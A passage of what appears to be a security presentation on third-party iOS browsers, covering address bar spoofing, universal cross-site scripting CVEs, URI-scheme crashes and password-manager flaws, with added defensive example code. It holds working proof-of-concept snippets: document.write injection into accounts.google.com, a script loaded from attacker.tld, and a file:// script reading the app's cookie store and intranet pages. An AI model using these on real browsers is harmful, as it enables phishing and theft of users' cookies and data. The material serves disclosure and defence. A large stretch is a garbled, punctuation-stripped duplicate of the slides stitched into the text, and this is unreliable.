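  const fromFrame = saveCredential(store, 'https://accounts.google.com/', 'bob', 'x', false);
  return {
    attackerSave,
    fromFrame,
    entries: store.length,
    googlePassword: store.find(e => e.origin === 'https://accounts.google.com').password,
    httpsTop: credentialsFor(store, 'https://accounts.google.com/', true),
    httpTop: credentialsFor(store, 'http://accounts.google.com/', true),
    httpsFrame: credentialsFor(store, 'https://accounts.google.com/', false),
    hostOnlyHttp: credentialsForHostOnly(store, 'http://accounts.google.com/'),
  };
}
```

The attacker's form is allowed to save, but only under its own origin, so the entry for accounts.google.com keeps the original password; the host-only matcher at the end is the variant that hands that password to a plain-http page with the same host name.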
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://iosbrowsr-tests.com/
Questions?

lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
• configuration.userContentController
• navigationDelegate
• UIDelegate
• URL (KVO)
• hasOnlySecureContent (KVO)

Bolted-on by the browsers
• Address bar
• Multiple tabs
• Downloads
• Support for untrusted SSL certificates
• Autocomplete & password manager
• … and many more features (safety ratings, malware protection, cloud integration, …)

Testing
• Inspiration from the Browser Security Handbook
• Retesting previous Mobile Safari bugs
• "Black-box" testing from the web perspective, review of JavaScript code, a bit of reversing and debugging
• Cross-browser test cases: https://ios.browsr-tests.com

Address Bar Spoofing
• Look-alike: IDN etc.
• URL tracking desynchronization:
  • Navigate to untracked content
  • Initiate navigation, interrupt, overwrite content
  • Failed navigation
  • Loading loop
  • Lots of other methods (race conditions, history, …)
  • Most of them known for over 10 years (IE, Netscape)

Untracked Content
Replace the window content with content the address bar does not track; document.write and/or data: URIs are usually good candidates.
• w = window.open('https://accounts.google.com'); setTimeout(function() { w.document.write(…) }, …)
• CVE-2013-5152 Mobile Safari Address Bar Spoofing: reported in iOS 5.1.1, fixed in iOS 7

Init & Interrupt
Initialise the window with the target URL, then replace it with phishing content before the target loads.
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to the native window.open (browsers often replace it with their own JavaScript bridge):
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)
Affected:
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45 of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)

Failed Navigation
An incorrect URL often remains in the address bar after a navigation error:
• DNS NXDOMAIN, host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts

Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function() { location = 'https://accounts.google.com:8443' }, …)

Title bar
A phishing page can also put a URL into the page title, which browsers show in the title bar:
• <title>https://www.apple.com</title>

Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying the SSL lock makes sense only if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
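The tips above are easiest to see as a state machine. The following is an added example, not code from the slides or from any of the tested browsers: a model of the address-bar controller a UIWebView-based browser bolts on top of the web view, fed with the sequence of UIWebViewDelegate-style events produced by the "failed navigation" and "loading loop" techniques. The event names, the `page` field (standing in for `webView.request.mainDocumentURL`, i.e. what is really rendered), the `tlsValid` flag and all URLs are assumptions made for the example.

```javascript
// Added example, not code from the original slides: a model of the address bar
// logic that a UIWebView-based browser bolts on top of the web view. Events
// mirror the UIWebViewDelegate callbacks; ev.page stands for the URL the web
// view really renders (webView.request.mainDocumentURL) and ev.tlsValid for
// the outcome of certificate validation. URLs and event sequences are
// constructed for the example.

function naiveAddressBar() {
  // Typical bolted-on bar: shows the URL of every navigation attempt as soon
  // as shouldStartLoadWithRequest fires, derives the lock from the scheme
  // and ignores didFailLoadWithError entirely.
  const state = { url: 'about:blank', lock: false };
  return {
    on(ev) {
      if (ev.type === 'shouldStartLoad') {
        state.url = ev.url;
        state.lock = ev.url.startsWith('https://');
      }
      return { url: state.url, lock: state.lock };
    },
  };
}

function hardenedAddressBar() {
  // Follows the tips: display only what is loaded, refresh on every delegate
  // event (including the failure callback) and show the lock only after a
  // finished load over a validated TLS connection.
  const state = { url: 'about:blank', lock: false, loading: false };
  return {
    on(ev) {
      switch (ev.type) {
        case 'shouldStartLoad': state.loading = true; state.lock = false; break;
        case 'didStartLoad':    state.url = ev.page; break;
        case 'didFailLoad':     state.loading = false; state.url = ev.page; state.lock = false; break;
        case 'didFinishLoad':
          state.loading = false;
          state.url = ev.page;
          state.lock = ev.page.startsWith('https://') && ev.tlsValid === true;
          break;
      }
      return { url: state.url, lock: state.lock, loading: state.loading };
    },
  };
}

function replay(makeBar, events) {
  const bar = makeBar();
  let shown = null;
  for (const ev of events) shown = bar.on(ev);
  return shown;
}

const ATTACKER = 'http://attacker.tld/phish.html';

// "Failed navigation": the phishing page is shown, then the page navigates to
// a host that does not resolve; the web view keeps rendering the old content.
const failedNavigation = [
  { type: 'shouldStartLoad', url: ATTACKER },
  { type: 'didStartLoad', page: ATTACKER },
  { type: 'didFinishLoad', page: ATTACKER, tlsValid: false },
  { type: 'shouldStartLoad', url: 'https://login.target.tld/' },
  { type: 'didFailLoad', page: ATTACKER, error: 'NSURLErrorCannotFindHost' },
];

// "Loading loop": navigation to a filtered port never connects and is retried
// by setInterval, so the request stays pending for minutes.
const loadingLoop = [
  { type: 'shouldStartLoad', url: ATTACKER },
  { type: 'didStartLoad', page: ATTACKER },
  { type: 'didFinishLoad', page: ATTACKER, tlsValid: false },
  { type: 'shouldStartLoad', url: 'https://accounts.google.com:8443/' },
  { type: 'didStartLoad', page: ATTACKER },
  { type: 'shouldStartLoad', url: 'https://accounts.google.com:8443/' },
];

// A genuine page with a valid certificate: the hardened bar does show the lock
// here, so the fix is not "never show it".
const genuineHttps = [
  { type: 'shouldStartLoad', url: 'https://target.tld/' },
  { type: 'didStartLoad', page: 'https://target.tld/' },
  { type: 'didFinishLoad', page: 'https://target.tld/', tlsValid: true },
];

function compare(events) {
  return { naive: replay(naiveAddressBar, events), hardened: replay(hardenedAddressBar, events) };
}
```

In both attack sequences the naive bar ends up showing the target host with a lock while the attacker's document is what the user sees; the hardened bar keeps showing the attacker URL and exposes a separate `loading` flag, which is what a progress indicator, not the URL field, should reflect.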

Universal Cross-Site Scripting (UXSS)
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (cf. http://en.wikipedia.org/wiki/Cross-site_scripting). Famous after the PDF UXSS in 2007.
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …

CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
  → mb.exec('$(WINDOW_ID)', [{ command: "window.open", target: 1234, url: "about:blank" }])   (target generated with Math.random())
  → [webView loadRequest: … "about:blank" …]
Cross-frame forgery:
w.document.write('Hi')
  → mb.exec('$(WINDOW_ID)', [{ command: "window.document.write", target: 1234, html: "Hi" }])
  → [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>') … and it just works in accounts.google.com

CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome for iOS
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
  → [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the content in the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
  → applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
  → [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
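The three browsers above fail at different points of the same decision: whether the tab that calls `w.document.write(…)` may write into the tab `w` refers to right now. The following is an added example, not code from the slides or from Mercury, Yandex.Browser or Chrome: a model of the JavaScript bridge behind window.open / document.write in a multi-tab UIWebView browser, with a "no check" policy (Mercury), a "check once at open time" policy (Yandex) and a policy that rechecks against the target tab's current origin at write time. The bridge method names, tab ids, policy names and URLs are assumptions made for the example.

```javascript
// Added example, not code from the original slides: a model of the bridge
// behind window.open / w.document.write in a multi-tab UIWebView browser.
// Each tab tracks the URL its web view currently renders; the bridge decides
// whether a caller tab may write into a target tab. Policies:
//   'none'          - Mercury: no same-origin check at all
//   'check-on-open' - Yandex: checked when the child is opened, never again
//   'recheck'       - safe: compared against the target's *current* origin
// Tab ids, URLs and method names are constructed for the example.

function originOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/?#]*)/i.exec(url);
  return m ? (m[1] + '://' + m[2]).toLowerCase() : null;
}

function makeBrowser(policy) {
  const tabs = new Map();
  let nextId = 1;
  function newTab(url, openerOrigin) {
    const id = nextId++;
    tabs.set(id, {
      url,
      // about:blank inherits the opener's origin, as WebKit itself does
      origin: url === 'about:blank' ? openerOrigin : originOf(url),
      allowedWriter: null,
      html: null,
    });
    return id;
  }
  return {
    newTopLevel(url) { return newTab(url, null); },
    open(callerId, url) {
      const caller = tabs.get(callerId);
      const id = newTab(url, caller.origin);
      const child = tabs.get(id);
      if (policy === 'check-on-open' && child.origin === caller.origin) child.allowedWriter = callerId;
      return id;
    },
    // the target tab follows a redirect or sets location: its origin changes
    navigate(id, url) {
      const t = tabs.get(id);
      t.url = url;
      t.origin = originOf(url);
    },
    write(callerId, targetId, html) {
      const caller = tabs.get(callerId);
      const target = tabs.get(targetId);
      let allowed;
      if (policy === 'none') allowed = true;
      else if (policy === 'check-on-open') allowed = target.allowedWriter === callerId;  // stale decision
      else allowed = target.origin !== null && target.origin === caller.origin;          // live decision
      if (allowed) target.html = html;
      return allowed;
    },
    tab(id) { return tabs.get(id); },
  };
}

const PAYLOAD = '<script src="http://attacker.tld/x.js"></script>';

// Yandex-style attack: open a same-origin child (passes an open-time check),
// redirect it to the victim site, then document.write into it.
function redirectThenWrite(policy) {
  const b = makeBrowser(policy);
  const attacker = b.newTopLevel('http://attacker.tld/');
  const child = b.open(attacker, 'http://attacker.tld/blank.html');
  b.navigate(child, 'https://accounts.google.com/');
  return b.write(attacker, child, PAYLOAD);
}

// Mercury-style attack: open the victim directly and write into it.
function directWrite(policy) {
  const b = makeBrowser(policy);
  const attacker = b.newTopLevel('http://attacker.tld/');
  const child = b.open(attacker, 'https://accounts.google.com/');
  return b.write(attacker, child, PAYLOAD);
}

// Legitimate use that must keep working: writing into one's own about:blank popup.
function legitimateWrite(policy) {
  const b = makeBrowser(policy);
  const page = b.newTopLevel('http://attacker.tld/');
  const child = b.open(page, 'about:blank');
  return b.write(page, child, 'Hi');
}
```

Only the `recheck` policy refuses both attacks while still allowing the about:blank popup case; the open-time check passes the redirect variant because the decision was cached before the child changed origin.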

Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com…"] —> nil for strings NSURL cannot parse (and nil means applewebdata://)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com…"), NULL) —> NULL
• Downloads opened directly from file://

Content-Disposition: attachment
• Displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• Isolated attachment origin (iOS 5+); but even there document.location.href and document.referrer still name the hosting site, which a hostname-based custom SOP implementation trusts:
  • document.location.href
  • document.referrer
  • w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain sniffed and rendered as HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream rendered as HTML
• application/other with filename=*.html

JS without Same-Origin Policy
Read the application's cookie store from a document opened from file:// (the container path is taken from the document's own URL):
<script>
  a = document.location.href.split('/');
  if (a[0] === 'file:') {
    path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
    path = path + '/Library/Cookies/Cookies.binarycookies';
    x = new XMLHttpRequest();
    x.open('GET', path, false);
    x.send();
    alert(x.responseText);
  }
</script>
Read an intranet site from the same document:
<script>
  x = new XMLHttpRequest();
  x.open('GET', 'https://your.intranet/', false);
  x.send();
  alert(x.responseText);
</script>
Challenge: hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
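Two decisions sit behind the Content-Type, Content-Disposition and "opening local files safely" slides: which origin a loaded document ends up in, and whether a download may be rendered as markup at all. The following is an added example, not code from the slides or from any browser: a model of the applewebdata:// / file:// origin rules described for CVE-2012-2899 and the "other potential paths" slide, and a render policy that treats anything HTML-like (by declared type, by file name, or by sniffing the body, as iOS < 7 did for text/plain) as untrusted source to be shown as text/plain with a neutral base URL and scripting off. The header values, file names, bodies and the `renderPlan` shape are assumptions made for the example.

```javascript
// Added example, not code from the original slides. (a) Which origin content
// loaded with loadHTMLString:baseURL: gets for a given baseURL, per the
// CVE-2012-2899 slides: nil, or a string NSURL cannot parse (which becomes
// nil), means applewebdata://, which behaves like file://, i.e. no same-origin
// policy. (b) Whether a download must be shown as text/plain in a sandbox
// instead of being rendered. Headers, names and bodies are constructed.

function originForBaseURL(baseURL) {
  if (baseURL === null || baseURL === undefined) {
    return { origin: 'applewebdata://', sopEnforced: false };
  }
  if (/^file:/i.test(baseURL)) return { origin: 'file://', sopEnforced: false };
  if (baseURL === 'about:blank') return { origin: 'about:blank', sopEnforced: true };
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/?#\s]+)/i.exec(baseURL);
  // unparseable string -> nil -> applewebdata://
  if (!m) return { origin: 'applewebdata://', sopEnforced: false };
  return { origin: (m[1] + '://' + m[2]).toLowerCase(), sopEnforced: true };
}

// Content sniffing: does the body look like HTML regardless of the header?
function looksLikeHtml(body) {
  return /<\s*(!doctype\s+html|html|head|body|script|iframe|img|svg|a|div)\b/i.test(String(body).slice(0, 512));
}

function parseContentDisposition(value) {
  const v = value || '';
  const m = /filename\*?\s*=\s*(?:"([^"]*)"|([^;]*))/i.exec(v);
  return { attachment: /^\s*attachment/i.test(v), filename: (m ? (m[1] || m[2] || '') : '').trim() };
}

// Decide how a download is handed to the web view.
function renderPlan(headers, body) {
  const type = (headers['content-type'] || '').split(';')[0].trim().toLowerCase();
  const cd = parseContentDisposition(headers['content-disposition']);
  const markup =
    type === 'text/html' || type === 'application/xhtml+xml' ||
    type === '' || type === 'application/octet-stream' ||   // unknown type: assume the worst
    /\.x?html?$/i.test(cd.filename) ||                      // a .html name overrides a made-up type
    looksLikeHtml(body);                                    // and so does the content itself
  return {
    treatAsMarkup: markup,
    mime: markup ? 'text/plain' : type,   // show the source, never render it
    baseURL: 'about:blank',               // never nil and never file://
    javaScriptEnabled: false,             // WKWebView: configuration.preferences.javaScriptEnabled = false
    csp: "sandbox; default-src 'none'",   // belt and braces in case it is rendered anyway
  };
}
```

A browser that keys the decision on the declared Content-Type alone passes every one of the three bypasses on the slide; `renderPlan` demotes all of them to text/plain and leaves genuinely non-HTML types (an image, a PDF) untouched.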

Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes
• Native (WebKit)
• Application (bolted-on)
• Bridge (internal), e.g.:
  scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
  scheme://add-filter?url=
• Registered (external)

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with broken percent-encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast:
  Program received signal EXC_BAD_ACCESS, Could not access memory.
  Reason: KERN_INVALID_ADDRESS at address: 0x00000000
  0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315)
  <iframe src="lets-try-format-string://%p%p%p%p…">
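The two failure modes in this section have one root: the URL string from the page reaches native code (CFURL, a scheme handler, a format string) without being validated and without the parse result being checked. The following is an added example, not code from the slides or from Opera Coast or Safari: the checks a browser's navigation delegate should run before it hands a URL to CFURL/NSURL or to a URI-scheme handler: a percent-encoding check, a null check on the parser result (WHATWG `URL` stands in for `CFURLCreateWithString` here), and a scheme policy that refuses internal bridge schemes from web content and requires a real user gesture for external schemes so that `<iframe src="customscheme://…">` cannot launch them. The scheme names, the request fields (`initiator`, `userGesture`, `targetBlank`) and the decision codes are assumptions made for the example.

```javascript
// Added example, not code from the original slides: validation a browser should
// apply to a URL before passing it to CFURL/NSURL or to a scheme handler.
// `new URL()` stands in for CFURLCreateWithString: a value the parser rejects
// is NULL/nil and must be treated as an error, never dereferenced. Scheme
// lists and request fields are constructed for the example.

function validPercentEncoding(url) {
  // every '%' must introduce exactly two hex digits
  for (let i = 0; i < url.length; i++) {
    if (url[i] !== '%') continue;
    if (!/^[0-9a-fA-F]{2}$/.test(url.slice(i + 1, i + 3))) return false;
    i += 2;
  }
  return true;
}

function parseOrNull(url) {
  try { return new URL(url); } catch (e) { return null; }
}

function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

const WEB_SCHEMES = new Set(['http', 'https']);
// hypothetical name of the browser's own internal bridge scheme
const INTERNAL_SCHEMES = new Set(['scheme']);

// req: { url, initiator: 'user'|'link'|'script'|'iframe', userGesture: bool, targetBlank: bool }
function navigationDecision(req) {
  if (!validPercentEncoding(req.url)) return { allow: false, reason: 'malformed percent-encoding' };
  if (parseOrNull(req.url) === null) return { allow: false, reason: 'unparseable url' };
  const scheme = schemeOf(req.url);
  if (scheme === null) return { allow: false, reason: 'no scheme' };
  if (WEB_SCHEMES.has(scheme)) {
    // ordinary navigation; a new window still needs a real gesture, and a
    // rewritten target=_blank link must not count as one by itself
    if (req.targetBlank && !req.userGesture) return { allow: false, reason: 'popup without user gesture' };
    return { allow: true, reason: 'web navigation' };
  }
  if (INTERNAL_SCHEMES.has(scheme)) {
    // bridge commands must never be reachable from page content at all
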